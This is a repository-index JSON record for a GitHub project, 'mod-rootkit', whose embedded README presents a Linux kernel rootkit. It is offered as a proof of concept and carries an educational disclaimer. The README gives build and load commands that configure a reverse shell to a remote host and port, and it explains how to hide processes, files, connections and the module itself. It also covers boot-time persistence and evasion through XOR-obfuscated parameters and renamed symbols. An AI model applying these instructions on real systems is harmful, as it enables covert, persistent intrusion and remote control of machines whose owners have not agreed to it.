{"id":26629939,"url":"https://github.com/flashnuke/mod-rootkit","last_synced_at":"2025-07-24T05:36:02.417Z","repository":{"id":283645029,"uuid":"947360677","full_name":"flashnuke/mod-rootkit","owner":"flashnuke","description":"Kernel-space x86_64 Linux rootkit leveraging kprobes and ftrace for syscall hooking (hiding entries and reverse shell backdoor)","archived":false,"fork":false,"pushed_at":"2025-04-07T17:01:57.000Z","size":165,"stargazers_count":7,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-07T17:37:28.384Z","etag":null,"topics":["backdoor","cybersecurity","ethical-hacking","hacking","kernel","kernel-rootkit","linux","linux-kernel","linux-kernel-module","linux-rootkit","lkm","lkm-root","malware","mod-rootkit","pentest","pentesting","reverse-shell","rootkit","rootkits","security"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/flashnuke.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-12T15:08:38.000Z","updated_at":"2025-04-07T17:01:55.000Z","dependencies_parsed_at":"2025-04-07T17:29:10.701Z","dependency_job_id":"04de049b-1927-4c92-906b-b8a5aa168610","html_url":"https://github.com/flashnuke/mod-rootkit","commit_stats":null,"previous_names":["flashnuke/mod-rootkit"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/flashnuke/mod-rootkit","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit","tags_url":"https://repos.ecosyste.
ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/flashnuke","download_url":"https://codeload.github.com/flashnuke/mod-rootkit/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/flashnuke%2Fmod-rootkit/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266796873,"owners_count":23985487,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-24T02:00:09.469Z","response_time":99,"last_error":null,"robots_txt_status":null,"robots_txt_updated_at":null,"robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["backdoor","cybersecurity","ethical-hacking","hacking","kernel","kernel-rootkit","linux","linux-kernel","linux-kernel-module","linux-rootkit","lkm","lkm-root","malware","mod-rootkit","pentest","pentesting","reverse-shell","rootkit","rootkits","security"],"created_at":"2025-03-24T13:16:19.304Z","updated_at":"2025-07-24T05:36:02.408Z","avatar_url":"https://github.com/flashnuke.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"```\n███╗   ███╗ ██████╗ ██████╗       ██████╗  ██████╗  ██████╗ ████████╗██╗  ██╗██╗████████╗\n████╗ ████║██╔═══██╗██╔══██╗      ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝██║ 
██╔╝██║╚══██╔══╝\n██╔████╔██║██║   ██║██║  ██║█████╗██████╔╝██║   ██║██║   ██║   ██║   █████╔╝ ██║   ██║   \n██║╚██╔╝██║██║   ██║██║  ██║╚════╝██╔══██╗██║   ██║██║   ██║   ██║   ██╔═██╗ ██║   ██║   \n██║ ╚═╝ ██║╚██████╔╝██████╔╝      ██║  ██║╚██████╔╝╚██████╔╝   ██║   ██║  ██╗██║   ██║   \n╚═╝     ╚═╝ ╚═════╝ ╚═════╝       ╚═╝  ╚═╝ ╚═════╝  ╚═════╝    ╚═╝   ╚═╝  ╚═╝╚═╝   ╚═╝   \n                                                                                                                                               \n```\n\n\nA simple proof-of-concept Linux Kernel Rootkit module designed to hide processes, files, network connections and itself from userland visibility, and offers the ability to establish a reverse shell, for modern kernel versions.\n\nThis module operates at the kernel level, allowing it to intercept system calls directly, enabling a higher degree of stealth compared to user-space techniques (e.g., `LD_PRELOAD`).\n\nUnlike traditional rootkits that rely on direct syscall table hooking or exported symbols like kallsyms_lookup_name(), this implementation leverages kprobes and ftrace (credit goes to [xcellerator](https://github.com/xcellerator/linux_kernel_hacking) for this method) — for greater stealth and compatibility. It avoids deprecated or removed interfaces, ensuring operability on recent kernel versions (e.g., 5.7+ where kallsyms_lookup_name() is no longer exported).\n\n## Overview\n\n`mod-rootkit` is a Loadable Kernel Module (LKM) that demonstrates basic rootkit techniques in Linux. 
Once inserted into the kernel, it provides stealth capabilities by intercepting and modifying system behavior to:\n\n- **Process Hiding** – Hide any process based on configured keywords (that appear in the cmdline)\n- **File \u0026 Directory Hiding** – Hide files and folders based on configured keywords\n- **Network Connection Hiding** – Hide network connections based on configured IP addresses or ports\n- **Module Hiding** – Hides itself from kernel module listings\n\n### Demo - Hiding names and processes\n```bash\nmake STRING_EXCLUDES=\"SOME_KEYWORD,hidden\"\nsudo insmod mod_rootkit.ko\n```\n\u003cimg width=\"437\" alt=\"image\" src=\"https://github.com/user-attachments/assets/855ae402-1cbd-4f5c-97d4-c83573f18a75\" /\u003e\n\n### Demo - Hiding network connections and a hidden reverse shell\n```bash\nmake RSHELL_HOST=127.0.0.1 RSHELL_PORT=9001 NET_EXCLUDES=9001\nsudo insmod mod_rootkit.ko\n```\n\u003cimg width=\"437\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c6fdb061-8fb6-4456-91a0-61037c303752\" /\u003e\n\n## Requirements\n\n- Linux system with kernel headers installed\n- GCC, make and kernel headers: `sudo apt update \u0026\u0026 sudo apt install -y build-essential linux-headers-$(uname -r) make gcc`\n- Root permissions\n- Kernel version - should work on any\n\nTested on x86_64 Linux only\n\n\n# Usage\n```bash\nsudo apt install -y build-essential linux-headers-$(uname -r) # install requirements\n\ngit clone https://github.com/flashnuke/mod-rootkit.git\ncd mod-rootkit\nmake STRING_EXCLUDES=\"SOME_FILENAME1,SOME_FILENAME2\" NET_EXCLUDES=\"127.0.0.1,2222\" RSHELL_HOST=192.168.1.1 RSHELL_PORT=9001 HIDE_MODULE=0\n# to add a reverse shell, see the parameter breakdown below\nsudo make install\nmake clean\n```\n\n## Breakdown:\n\n### Building the Module\nTo compile the module:\n```bash\nmake STRING_EXCLUDES=\"SOME_FILENAME1,SOME_FILENAME2\" NET_EXCLUDES=\"127.0.0.1,2222\" HIDE_MODULE=0\n```\nYou can also set up a reverse shell:\n```bash\nmake RSHELL_HOST=192.168.1.1 
RSHELL_PORT=9001 NET_EXCLUDES=9001 # NET_EXCLUDES is used to hide the connection, it's not mandatory\n```\n\n| Parameter        | Required? | Description                                                                 |\n|------------------|-----------|-----------------------------------------------------------------------------|\n| `STRING_EXCLUDES`| No        | Comma-separated list of strings to hide from `getdents` (e.g., file/process names) |\n| `NET_EXCLUDES`   | No        | Comma-separated list of IPs/ports whose connections are hidden                   |\n| `HIDE_MODULE`    | No        | Set to `1` to auto-hide the module after load (hides from `lsmod`, etc.)  |\n| `MODULE_NAME`    | No        | Default is `mod_rootkit`, override to change the module name                |\n| `RSHELL_HOST`    | No        | IP address of the reverse shell host                |\n| `RSHELL_PORT`    | No        | Port of the reverse shell host                |\n\n### Loading / removing the module manually\nTo load:\n```bash\nsudo insmod mod_rootkit.ko\n```\n\nTo remove:\n```bash\nsudo rmmod mod_rootkit\n```\n\n### Install the module (Auto-load on boot)\n```bash\nsudo make install\n```\nThis will register the module, create a boot-time autoload config and load the module immediately with `modprobe`\n\n### Uninstall the module\n```bash\nsudo make uninstall\n```\nThis will attempt to unload the module from the running kernel and remove it from auto-load on boot\n\n### Clean build artifacts\n```bash\nmake clean\n```\nThis will remove all temporary build files\n\n### Additional usage notes\n\n* When hiding a process - make sure its cmdline contains a substring that is then passed via `STRING_EXCLUDES`, e.g.: running \"`./HIDEME.sh`\" and then passing `make ... 
STRING_EXCLUDES=HIDEME ...`\n* For every string inside the `*_EXCLUDES` params, a partial match is enough for an entry to be hidden (it doesn't have to be a full match, e.g.: `STRING_EXCLUDES=ABC` would hide entry `...ABCDE...`)\n* Setting `HIDE_MODULE=1` hides the module, use with caution as it's not trivial to remove it afterwards\n* `NET_EXCLUDES` example - `NET_EXCLUDES=127.0.0.1,12345` would exclude all connections to/from `127.0.0.1` and all connections to/from port `12345`\n* If reverse shell params are set, the module attempts to establish a reverse shell connection to the host every 10 seconds.\n\n### Obfuscation\n\nThe input parameters (exclusions, reverse shell params) are XOR'd and decrypted at runtime.\u003cbr\u003e\nThe module is compiled using special flags, and the `.ko` file is stripped as part of the make process.\u003cbr\u003e\nHowever, symbols cannot be completely stripped (due to the nature of `ftrace`) but can be obfuscated manually, using macros:\n```c\n// header file\n#define rshell_func z9qr_x1\nextern int z9qr_x1(void* data);\n...\n// src file\nint z9qr_x1(void* data) {...} // int rshell_func(void* data)\n```\n\n\n# Disclaimer\n\nThis project is provided **strictly for educational and ethical research** purposes.  \nInstalling or deploying rootkits on unauthorized systems is **illegal and unethical**.\n\nUse this project only in isolated lab environments, virtual machines, or test systems under your full control.\n\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflashnuke%2Fmod-rootkit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflashnuke%2Fmod-rootkit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflashnuke%2Fmod-rootkit/lists"}